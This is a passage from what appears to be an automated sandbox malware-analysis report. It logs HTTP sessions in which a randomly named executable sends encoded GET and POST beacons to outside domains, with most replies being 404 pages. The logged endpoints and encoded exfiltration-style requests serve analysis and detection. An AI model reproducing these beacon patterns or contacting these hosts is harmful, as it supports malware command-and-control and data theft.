                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202491.sbs/rq5n/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 6b 6b 2f 6b 6f 4c 65 77 6f 4a 6f 4a 79 64 4c 65 2f 46 6e 32 75 2b 43 4a 59 4b 33 42 77 70 72 50 4d 77 44 78 6a 6c 43 6f 71 65 53 69 61 41 57 74 66 39 43 33 63 48 4e 4f 49 38 44 6a 32 58 57 56 4f 49 48 4a 51 33 4b 31 35 68 56 76 68 5a 34 73 41 33 5a 48 2f 77 44 67 67 6c 6c 4c 78 76 53 30 37 70 45 37 6a 64 51 59 72 33 6e 50 73 4f 66 51 4c 38 43 32 49 68 52 73 64 33 43 4e 36 32 30 78 5a 42 68 58 6c 68 70 66 56 51 34 38 6d 76 49 48 35 4b 42 32 63 74 6b 50 30 41 57 48 7a 5a 48 44 68 71 78 55 6d 50 63 41 58 6b 44 65 6b 79 2f 31 6c 74 65 49 47 41 4c 4b 64 57 57 33 70 49 35 56 78 6e 39 74 6b 68 51 75 55 70 48 35 5a 49 2b 51 75 31 32 4f 70 54 6f 74 5a 63 79 55 34 48 53 78 52 30 4d 36 62 55 66 73 75 44 55 77 4e 37 50 79 66 71 57 76 6c 6e 44 53 59 71 65 37 34 59 79 54 48 30 48 36 6f 6b 33 6f 4d 39 39 63 31 36 37 4d 31 6c 79 74 47 53 59 34 30 4a 6b 46 6b 59 5a 50 76 38 43 37 2f 47 55 55 33 45 6f 33 6b 5a 6d 31 53 43 32 6d 53 31 47 72 43 6c 2b 62 48 32 50 48 68 72 37 58 6e 50 44 5a 56 58 46 45 [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=kk/koLewoJoJydLe/Fn2u+CJYK3BwprPMwDxjlCoqeSiaAWtf9C3cHNOI8Dj2XWVOIHJQ3K15hVvhZ4sA3ZH/wDggllLxvS07pE7jdQYr3nPsOfQL8C2IhRsd3CN620xZBhXlhpfVQ48mvIH5KB2ctkP0AWHzZHDhqxUmPcAXkDeky/1lteIGALKdWW3pI5Vxn9tkhQuUpH5ZI+Qu12OpTotZcyU4HSxR0M6bUfsuDUwN7PyfqWvlnDSYqe74YyTH0H6ok3oM99c167M1lytGSY40JkFkYZPv8C7/GUU3Eo3kZm1SC2mS1GrCl+bH2PHhr7XnPDZVXFEr7prM7brXp5dcKbnc3tUFyFLSPpBcHnDK+vT2YIxXkdRwlat9S8kAuvV3XfXkzC+PPwv9qiO9d6Y1Yut63305b4W7DDt4gsACiO476IqwF0sBtQJNcEi9RVauvvlzt3zFuh8BnKcoBxw5kF5P4L8mRD6ObWlTnbqCncP8VrQYP9wzBOWSgsNRrmAYUy/j/RGehnogGwz1JHJQq2jFxoi7bz5UNmrCw0JzzK3DBBNQej7yShaUwCyXGsdGIpx3TplMXlsBKy0eotaav6RL0Z9SvS7EYNggei7iLWfbzOqchcds2OlSmxz4QZs2krWv7UZvqFX9Nr7PkhD5YVY18qRec+jvxWQcvZextOR4zvpjdBCZTC/AyjL6rD7Bwy2q/L/qdQ5dgyT7ApxhbnhWaEsyuWY0P50eyLrbtwFOgGRwJnGIcv527r5OFK6fzoZPhrguShHSj7LuLzfnTVw8SWYjKKTrsICmexVGEWGWKHW2xgcggaUM8/liu9J1v01Nk6D/xV2T9oyZIBGXZtsuy4mL1p7+WE/5d5Ot9hKFin8lYfp3AucRHNQG7RnpUePgxZre2iEbcTUxnMBSZSD0iLHnH8c94aHitoJRFSIUgpHrrRagK9beaaflkQ9iPlBLvXdvLV55wryx3jva44GFrXbzxf5EdasTL0YAT [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:36:29.376069069 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:36:29 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Data Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                                                              Data Ascii: 135BZJvLRMUhqCV's=pB<w?qKvm( o=|3q+{XV)w]vtOv,"fv?B0GV]nyyG=56jZ:UMh/0K'wRUX7!rV&Y:s*^o/^VL?{f]m7n*/L-B/?.+0@{?{T`+1J`YiG~LgK{?uMSap;kWa~g[<6.83Fnwzf>v=%ZqM\[My}zze/meeVu7/y6AVYfN"{fWiKK=0}+nf <|#5uWi~?ulriocWRrd~"+7)o|Gp++S'@[YUeM^_WXBGWxGV^5^Y}q+|g|qW&0zDP7q#C6=-L/1euI+=SwU`^Wo-/z#.6F-H~%Y}i,O9 A%?ZYIZufsoD G8~OI{tmH75>Z#P:{}>Lnn!AOl^:?Ww'
                                                                                                                              Oct 7, 2024 12:36:29.376112938 CEST224INData Raw: 4a e0 6f 66 78 e3 e7 6f 89 eb 84 e6 e0 4f 09 08 a4 2f 86 19 8f c8 bc fb f3 cd 36 b7 a8 bd 19 ee 95 97 67 e5 25 43 3d 0c 0a 37 06 b1 ae b9 71 c0 7e 4e 1f b1 80 ff b4 0f 83 20 74 1c 37 7d 63 a9 1f ed db 55 7e ba 20 fb d9 af df cf 7b 63 bf 5f 71 cb
                                                                                                                              Data Ascii: JofxoO/6g%C=7q~N t7}cU~ {c_qY+~7/CQOEK{?zvGY?U)g:$?*d4^}oa'CFXx!g9iY\W8
                                                                                                                              Oct 7, 2024 12:36:29.376151085 CEST1236INData Raw: cb 61 fc 2a 7e f4 2b fb f6 7a bc f9 60 e8 55 24 e4 e6 9c de 2f bb 51 ce cb 81 fb d9 fa 1f 00 e8 26 5f 7f 66 f8 37 aa 1f 04 1f 8a 02 aa fd 5f 04 9f 1f c3 46 5d c4 7f 72 cc ca 7c b8 84 11 38 4f fd bf 58 66 e9 8e 88 2f e1 86 59 6a 2d 32 9f fa 19 0d
                                                                                                                              Data Ascii: a*~+z`U$/Q&_f7_F]r|8OXf/Yj-2^/,-lPFz4?2CYR+;m^T[u%HD3vS&2]+0cdv*+,R/t+|Cv>:3.-T]|6^8;.wV"
                                                                                                                              Oct 7, 2024 12:36:29.376188993 CEST1236INData Raw: 43 82 0e 14 b7 c3 65 53 54 17 ad 20 8a 6a ac 46 8a d5 96 da 24 77 12 c7 82 03 8e 5c af 38 b6 5d 33 35 b9 c5 91 72 25 86 ab 31 40 4c bb 1f b3 3e ed 72 87 d8 94 a8 a8 a2 39 04 92 ba 16 5c 4e 93 bb 72 6d 4a 99 26 66 ac b9 4f 7c 9c 51 fd c5 b1 10 36
                                                                                                                              Data Ascii: CeST jF$w\8]35r%1@L>r9\NrmJ&fO|Q6,S`A1U=5gO;"J><C6'6pAn%*h*!!.c@CYjH%:^RZ3W-z\A=H6*A2Bu_]JC6ax,DBMk9l[sG:Gr>`U
                                                                                                                              Oct 7, 2024 12:36:29.376224995 CEST1236INData Raw: ce aa c5 69 5c cb 23 c5 85 5b 3a 2d 98 6e 99 d2 e6 49 5c 2d b6 91 4a b6 19 33 3f 69 10 e4 e8 eb b2 e6 e7 d0 82 cc 31 86 23 bc a9 53 7a c7 a0 9b aa 6b 75 1f d7 82 be d8 15 5a 09 0e 57 0c 8f 2c fd b3 18 17 a6 46 36 51 3b 3a a6 bb a4 e6 56 13 52 f3
                                                                                                                              Data Ascii: i\#[:-nI\-J3?i1#SzkuZW,F6Q;:VRWd@vHNffD1zO[h6xQ8PDaf$-C[":dn5cqakS8S$j:DVHkJa"x7vigpPYAtHb4
                                                                                                                              Oct 7, 2024 12:36:29.376260996 CEST64INData Raw: be b1 df 0b 8d ff fd 5f a0 14 84 8e 06 d7 d4 3e 30 d9 b3 d9 cc 1b 83 bc c7 d7 23 7c 6d b5 47 f8 39 91 3d 5e de cb 7d fb ed 7f 00 00 00 ff ff 03 00 e2 28 6a b3 8d 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: _>0#|mG9=^}(j'0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              48192.168.2.650043162.0.215.33801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:31.367244005 CEST513OUTGET /rq5n/?ej6Le=pmXEr/OQw9QJm4Xk+l3iuqWeb8HinOXDTGqjp1WLtMjib1CidozVAjoZZY6l6lG8OprBPnix8hR5i/scUhhw8x7Qq3ZF1dacyLUi3r4qrR6Xp8uTLrynRTshDzTWpn0bQ1psq0A=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:36:31.961532116 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              date: Mon, 07 Oct 2024 10:36:31 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Data Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                                                              Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:36:31.961568117 CEST1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                                                              Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                                                                              Oct 7, 2024 12:36:31.961584091 CEST1236INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                                                                              Oct 7, 2024 12:36:31.961601973 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                                                                              Oct 7, 2024 12:36:31.961621046 CEST896INData Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34
                                                                                                                              Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
                                                                                                                              Oct 7, 2024 12:36:31.961724043 CEST1236INData Raw: 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73 56 78 4a 6f 51 77 6d 37 62 50 68 51 37 63 7a 61 35 45 43 47 51 47 70 67 36 54 6e 6a 7a 6d 57 42 62 55 37 74 45 78 6b 68 56 77 33 36 79 7a 33 48
                                                                                                                              Data Ascii: I9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPex3NaIQLwHIIQlQkPbwsRFpdmdb/hD8TSDCwTBu8W30sSIiS7
                                                                                                                              Oct 7, 2024 12:36:31.961795092 CEST1236INData Raw: 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55 67 65 6a 65 6d 36 56 73 7a 77 61 4e 4a 35 49 51 54 39 72 38 41 55 46 30 34 2f 44 6f 4d 49 2b 4e 68 31 5a 57 35 4d 34 63 68 4a 35 79 75 4e 52 4d
                                                                                                                              Data Ascii: BdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab
                                                                                                                              Oct 7, 2024 12:36:31.961944103 CEST1236INData Raw: 55 35 45 72 6b 4a 67 67 67 3d 3d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 37 30 25 3b 0a 20
                                                                                                                              Data Ascii: U5ErkJggg==); } .container { width: 70%; } .status-code { font-size: 900%; } .status-reason { font-size: 450%;
                                                                                                                              Oct 7, 2024 12:36:31.961960077 CEST807INData Raw: 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 68 65 61 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 77 77 2e 6e 69 65 75 77 73 2d 6a 75 6c 79 32 30 32 34 39 31 2e
                                                                                                                              Data Ascii: <div class="info-heading"> www.nieuws-july202491.sbs/cp_errordocument.shtml (port 80) </div> </li> <li class="info-server"></li>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              49192.168.2.6500448.217.17.192801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:37.032697916 CEST772OUTPOST /x0tl/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.meliorahomes.net
                                                                                                                              Origin: http://www.meliorahomes.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.meliorahomes.net/x0tl/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 77 76 34 32 70 5a 41 4c 4e 6f 6a 50 38 42 59 57 70 33 73 7a 43 33 56 30 64 46 44 7a 52 6d 6e 78 6e 74 7a 71 6a 42 66 36 33 49 67 2b 52 66 74 64 69 66 38 43 5a 33 4a 79 30 78 46 31 31 57 61 67 38 68 43 54 71 6f 53 53 7a 6d 75 42 37 6c 4b 6c 49 74 37 34 53 70 43 4e 67 56 52 7a 63 73 54 4d 4f 66 51 51 31 6f 4f 59 4d 6f 65 78 53 47 42 6f 77 73 61 6d 37 50 33 30 62 56 41 4f 57 31 5a 6d 76 5a 35 47 79 47 42 54 52 35 63 6e 41 4c 33 50 48 42 66 6d 70 44 57 52 34 41 38 30 6f 54 4f 77 57 36 5a 30 43 4f 59 35 59 51 71 39 6d 32 7a 37 78 64 45 6e 58 6d 6e 33 2b 6b 6a 63 33 69 66 64 42 4d 71 68 75 6d 4b 31 50 65 51 4a
                                                                                                                              Data Ascii: ej6Le=wv42pZALNojP8BYWp3szC3V0dFDzRmnxntzqjBf63Ig+Rftdif8CZ3Jy0xF11Wag8hCTqoSSzmuB7lKlIt74SpCNgVRzcsTMOfQQ1oOYMoexSGBowsam7P30bVAOW1ZmvZ5GyGBTR5cnAL3PHBfmpDWR4A80oTOwW6Z0COY5YQq9m2z7xdEnXmn3+kjc3ifdBMqhumK1PeQJ
                                                                                                                              Oct 7, 2024 12:36:37.921485901 CEST393INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:37 GMT
                                                                                                                              Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 30 74 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              50192.168.2.6500458.217.17.192801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:39.576016903 CEST796OUTPOST /x0tl/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.meliorahomes.net
                                                                                                                              Origin: http://www.meliorahomes.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.meliorahomes.net/x0tl/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 77 76 34 32 70 5a 41 4c 4e 6f 6a 50 39 68 6f 57 71 51 34 7a 45 58 56 33 42 56 44 7a 61 47 6e 31 6e 74 2f 71 6a 41 62 71 33 2b 59 2b 52 39 31 64 6a 64 45 43 56 58 4a 79 7a 42 45 2f 72 6d 61 56 38 68 4f 74 71 74 71 53 7a 6d 71 42 37 67 32 6c 50 65 54 33 54 35 43 50 70 31 52 69 53 4d 54 4d 4f 66 51 51 31 6f 79 79 4d 6f 57 78 52 7a 4a 6f 78 4e 61 6e 39 2f 33 72 52 31 41 4f 53 31 5a 71 76 5a 35 65 79 45 31 70 52 37 55 6e 41 4a 66 50 48 53 48 6c 6d 44 57 58 6e 51 38 6d 75 79 65 35 65 73 6f 57 4b 2f 51 47 50 48 32 6f 6e 41 79 68 74 75 45 45 46 32 48 31 2b 6d 37 75 33 43 66 33 44 4d 53 68 38 78 47 53 41 71 31 71 69 4d 43 42 42 74 36 67 72 36 4e 6f 48 50 31 71 50 5a 30 2f 53 41 3d 3d
                                                                                                                              Data Ascii: ej6Le=wv42pZALNojP9hoWqQ4zEXV3BVDzaGn1nt/qjAbq3+Y+R91djdECVXJyzBE/rmaV8hOtqtqSzmqB7g2lPeT3T5CPp1RiSMTMOfQQ1oyyMoWxRzJoxNan9/3rR1AOS1ZqvZ5eyE1pR7UnAJfPHSHlmDWXnQ8muye5esoWK/QGPH2onAyhtuEEF2H1+m7u3Cf3DMSh8xGSAq1qiMCBBt6gr6NoHP1qPZ0/SA==
                                                                                                                              Oct 7, 2024 12:36:40.465425968 CEST393INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:40 GMT
                                                                                                                              Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 30 74 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              51192.168.2.6500468.217.17.192801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:42.126420975 CEST1809OUTPOST /x0tl/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.meliorahomes.net
                                                                                                                              Origin: http://www.meliorahomes.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.meliorahomes.net/x0tl/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
